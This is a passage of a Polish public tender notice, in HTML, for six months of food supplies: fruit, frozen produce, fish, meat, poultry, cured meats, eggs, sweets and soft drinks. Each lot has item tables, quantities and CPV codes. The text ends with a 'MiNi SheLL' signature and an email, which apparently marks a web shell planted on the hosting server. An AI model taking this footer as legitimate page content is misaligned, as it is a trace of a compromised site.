<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> DOSTAWA OWOCÓW ŚWIEŻYCH I SUSZONYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


l.p	Nazwa artykułu	Sugerowana waga jednostkowa	Jedn. miary	Orient.
ilość
zamówienia	Cena jedn. netto	Wartość netto
1	Arbuz		kg	180		
2	Banany	200g/szt	kg	850		
3	Brzoskwinia 	150g/szt	kg	100		
4	Cytryny		kg	1		
5	Czereśnie		kg	50		
6	Grapefruit	300-400g/szt	kg	80		
7	Jabłka		kg	600		
8	Jabłka deserowe 	200g/szt	kg	530		
9	Jagody		kg	10		
10	Morele		kg	30		
11	Mandarynki	80-100g/szt	kg	170		
12	Nektaryny	150g/szt	kg	30		
13	Owoce kiwi	100-120g/szt	kg	60		
14	Pomarańcze	200g/szt	kg	300		
15	Truskawki świeże		kg	20		
16	Śliwki		kg	250		
17	Śliwki deserowe		kg	200		
18	Winogrona deserowe (VII-X)		kg	100		
19	Winogrona deserowe (XI-XII)		kg	15		
20	Wiśnie		kg	50		
21	Rabarbar		kg	150		
22	Gruszki deserowe		kg	100		
23	Gruszki suszone		kg	2,5		
24	Śliwki suszone, bez pestek		kg	6		
25	Jabłka suszone		kg	2,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 15.33.24.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> DOSTAWA WARZYW I OWOCÓW MROŻONYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna ilość zamówienia	Jedn. cena netto	Wartość netto
1	Brokuły 	450g	kg	2		
2	Brokuły 	2000-2500g	kg	60		
3	Brukselka	450g	kg	2		
4	Brukselka	2000-2500g	kg	30		
5	Kalafior	450g	kg	2		
6	Kalafior	2000-2500g	kg	55		
7	Mieszanka kompotowa (wiśnia, aronia, czarna porzecza, śliwka, truskawka)	450g	kg	5		
8	Mieszanka kompotowa (wiśnia, aronia, czarna porzecza, śliwka, truskawka)	2000-2500g	kg	460		
9	Szpinak	450g	kg	5		
10	Szpinak	2000-2500g	kg	110		
11	Truskawki	450g	kg	2		
12	Truskawki	2000-2500g	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.31.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> DOSTAWA RYB MROŻONYCH, ŚWIEŻYCH, WĘDZONYCH I PRZETWORÓW RYBNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna ilość zamówienia	Cena jedn. netto	Wartość netto
1	Filety z zielonego śledzia	 	kg	60		
2	Filety z mintaja płaty SHP	 	kg	40		
3	Filety z dorsza płaty, b/skóry, SHP	 	kg	20		
4	Filet z pangi trymowanej płaty, SHP	 	kg	200		
5	Filety z matiasa b/skóry solone	 	kg	80		
6	Filety z matiasa b/skóry solone	150-500g	kg	4		
7	Filety śledziowe w oleju z różnymi dodatkami	 	kg	35		
8	Filety śledziowe w oleju z różnymi dodatkami	150-500g	kg	3		
9	Sałatka z filetów śledziowych
w majonezie 	 	kg	35		
10	Sałatka z filetów śledziowych 
w majonezie 	100-500g	kg	4		
11	Sałatka -krajanka z filetów śledziowych w oleju z różnymi dodatkami	 	kg	25		
12	Sałatka - krajanka z filetów śledziowych w oleju z różnymi dodatkami	100-500g	kg	5		
13	Koreczki śledziowe z różnymi dodatkami	 	kg	15		
14	Koreczki śledziowe z różnymi dodatkami	100-500g	kg	5		
15	Klopsy rybne opiekane w zalewie	1000-3000g	kg	20		
16	Klopsy rybne opiekane w zalewie	100-500g	kg	7		
17	Pasty rybne(z makreli, tuńczyka, łososia itp.) 	 	kg	35		
18	Pasty rybne(z makreli, tuńczyka, łososia itp.) 	50-170g	kg	5		
19	Płaty śledziowe marynowane	2000-4000g	kg	40		
20	Płaty śledziowe marynowane	100-500g	kg	3		
21	Makrela wędzona ,tusza	 	kg	200		
22	Szproty wędzone	 	kg	20		
23	Łosoś wędzony - plastry	 	kg	0,1		
24	Paprykarz*	150-400g	kg	50		
25	Filety rybne w pomidorach 
o zaw. min.60% mięsa rybnego	150-200g	kg	3		
26	Filety rybne w oleju
o zaw.min.60% mięsa rybnego	150-200g	kg	3		
27	Szproty w oleju 	150-200g	kg	40		
28	Tuńczyk w oleju - kawałki	150-200g	kg	30		
29	Śledzie w oleju  o zaw.min.60% mięsa rybnego 	150-200g	kg	10		
30	Śledzie w pomidorach o zaw. min. 60% mięsa rybnego.	150-200g	kg	10		
31	Kawior (czarny, czerwony)	50-100g	kg	0,1		
32	Karp świeży patroszony bez głowy-płat		kg	30		
33	Ryba w galarecie	170-200g	kg	13.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.22.00.00-6, 15.21.11.00-1, 15.23.40.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> DOSTAWA MIĘSA WIEPRZOWEGO I WOŁOWEGO ORAZ PODROBÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Jm	Orientacyjna ilość zamówienia	Cena jedn. netto	Wartość 
netto
1	Boczek wieprzowy bez kości -świeży	kg	8		
2	Flaki wołowe parzone, cięte 	kg	40		
3	Karczek wieprzowy bez kości - świeży	kg	15		
4	Łopatka wieprzowa bez kości - świeża	kg	700		
5	Mięso mielone wieprzowo-wołowe - świeże	kg	20		
6	Nóżki wieprzowe - świeże	kg	40		
7	Ozory wieprzowe - świeże	kg	45		
8	Płuca wieprzowe - świeże	kg	20		
9	Schab wieprzowy bez kości - świeży	kg	200		
10	Słonina mielona - świeża	kg	35		
11	Wołowe ekstra bez kości - świeże	kg	20		
12	Wołowe z kością, antrykot - świeże	kg	140		
13	Żeberka wieprzowe, paski - świeże	kg	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> DOSTAWA MIĘSA I PODROBÓW DROBIOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp	Nazwa artykułu	Sugerowana waga jednostkowa 	Jm.	Orientacyjna ilość zamówienia	Cena jedn. netto	Wartość netto
1	Kurczaki świeże	1300 -1700g	kg	90		

2	Porcje rosołowe mrożone -paczkowane	500g -1500g	kg	300		
3	Serca z indyka świeże 		kg	30		
4	Udka z kurczaka, ćwiartki - świeże	350-400g	kg	50		
5	Wątróbka z kurczaka -świeża 		kg	70		
6	Żołądki z indyka - świeże 		kg	45		
7	Filety z kurczaka - świeże		kg	140		
8	Filety z indyka - świeże		kg	30		
9	Podudzie z kurczaka - świeże	150g-180g	kg	260		
10	Filet z udźca z kurczaka, bez skóry - świeży	100-160g	kg	70		
11	Filet z udźca z kurczaka, ze skórą - świeży	120 - 180g	kg	135		
12	Udziec z kurczaka z kością - świeży	150-180g	kg	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.23.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> DOSTAWA WĘDLIN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


LP	Nazwa artykułu	Nazwa własna*	

Jm	Orientacyjna ilość zamówienia	Cena jedn. netto	Wartość netto
1	Baleron gotowany		kg	55		
2	Blok drobiowy 		kg	100		
3	Blok wieprzowy 		kg	50		
4	Boczek rolowany faszerowany		kg	60		
5	Boczek wędzony surowy, paski bez kości, 		kg	150		
6	Filet z indyka wędzony, pieczony - płat		kg	20		
7	Frankfuterki wieprzowe surowe, wędzone 		kg	5		
8	Galareta mięsna wieprzowa		kg	20		
9	Kiełbasa biała parzona, wieprzowa 		kg	70		
10	Kiełbasa wieprzowa grubo mielona, podsuszana -kanapkowa 		kg	90		
11	Kiełbasa parówkowa wieprzowa 		kg	230		
12	Kiełbasa wieprzowa surowa, wędzona		kg	30		
13	Kiełbasa wieprzowa swojska pieczona - cienka		kg	140		
14
	Kiełbasa wieprzowa grubo mielona, parzona - kanapkowa 		kg	100		
15	Kiełbasa wieprzowa szynkowa		kg	100		
16	Kiełbasa śląska drobiowa		kg	100		
17	Kiełbasa śląska wieprzowa		kg	100		
18	Kiełbasa toruńska		kg	120		
19	Kiełbasa zwyczajna wieprzowa 		kg	110		
20	Kiełbaski wieprzowe z serem		kg	15		
21	Krupniok śląski		kg	60		
22	Bułczanka		kg	40		
23	Metka wieprzowa grubo mielona,  podwędzana		kg	100		
24	Metka smakowa (cebulowa, tatarska, łososiowa)		kg	12		
25	Mielonka wieprzowe		kg	90		
26	Mortadela wieprzowa		kg	105		
27	Ogonówka parzona		kg	120		
28	Parówki drobiowe		kg	300		
29	Parówki śląskie wieprzowe 		kg	160		
30	Pasztetowa popularna		kg	45		
31	Pasztetowa podwędzana		kg	60		
32	Polędwica sopocka 		kg	40		
33	Polędwica z indyka		kg	40		
34	Rolada drobiowa faszerowana 		kg	150		
35	Salami wieprzowe szlachetne		kg	5		
36	Salceson jasny		kg	70		
37	Salceson ozorkowy		kg	50		
38	Szynka drobiowa 		kg	800		
39	Szynka gotowana wieprzowa		kg	30		
40	Szynka konserwowa wieprzowa		kg	85		
41	Szynka wieprzowa w galarecie z warzywami		kg	45		
42	Szynka wieprzowa
(wiejska, swojska itp.) 		kg	60		
43	Tymbaliki drobiowe 		kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> DOSTAWA JAJ KURZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


l.p.	Nazwa artykułu	Sugerowana
waga jajka	Jm	Orientacyjna ilość	Cena jedn. netto	Wartość netto
1	Jaja kurze	63g-73g (L)	szt	15000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> DOSTAWA CZEKOLAD I WYROBÓW CUKIERNICZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


l.p.	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna
Ilość zamówienia
	Cena jedn. netto	Wartość netto
1	Biszkopty	100-500g	kg	10		
2	Biszkopty 	1000-3000g	kg	30		
3	Bombonierka - czekoladki nadziewane 	100-200g	kg	10		
4	Cukierki czekoladowe 
(typu buławki, michałki lub równoważne)	luz	kg	10		
5	Ciastka maślane 	800-2500g	kg	5		
6	Ciastka deserowe (kakaowe, z cukrem, z kokosem itp.)	800-2500g	kg	25		
7	Ciastka deserowe oblewane czekoladą	800-2500g	kg	5		
8	Ciasteczka deserowe 
z nadzieniem owocowym, kremowym	800-2500g	kg	6		
9	Pierniki nadziewane
w czekoladzie	800-2500g	kg	5		
10	Biszkopty z galaretką 
w czekoladzie	800-1000g	kg	5		
11	Galaretka w czekoladzie	1000g	kg	6		
12	Praliny nadziewane 
(min. 40%masy kakaowej)	1000g	kg	3		
13	Czekolada mleczna 
(min.30% masy kakaowej)	100g	szt.	70		
14	Ciastka bez dodatku cukru 	70g-150g	kg	11		
15	Wafelki bez dodatku cukru	70-150g	kg	3		
16	Mieszanka czekoladowa-opakowanie świąteczne	250-350g	kg	37		
17	Kostka marcepanowo-piernikowa z galaretką 
w czekoladzie	100-150g	kg	16		
18	Pierniki w czekoladzie 
(serca, gwiazdki, precelki)	400-500g	kg	55		
19	Czekolada mleczna nadziewana - opakowanie świąteczne 
(min.30% masy kakaowej)	100g	szt.	110		
20	Czekolada mleczna, deserowa bez dodatku cukru	100g	szt.	60		
21	Zestaw świąteczny 
z mikołajem w czekoladzie mlecznej 	100g	szt.	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> DOSTAWA NAPOJÓW BEZALKOHOLOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

l.p.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia	Cena jedn. netto	Wartość netto
1	Napoje owocowe pasteryzowane
niegazowane 
( min. 25% soku )	1000 -2000ml	l	300		
2	Soczki owocowo-warzywne 100% przecierowe, 	250-330ml	l	180		
3	Soki owocowo - warzywne 100% przecierowe, 	750-1000ml	l	250		
4	Syrop wysokosłodzony	330-500ml	l	20		
5	Woda mineralna gazowowana/niegazowana	1500 ml	szt	20		
6	Soczki owocowe 
ze słomką, 	200-250ml	l	2		
7	Piwo ciemne bezalkoholowe	400 - 500ml	l	4		
8	Soki owocowe 100%	1000ml	l	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com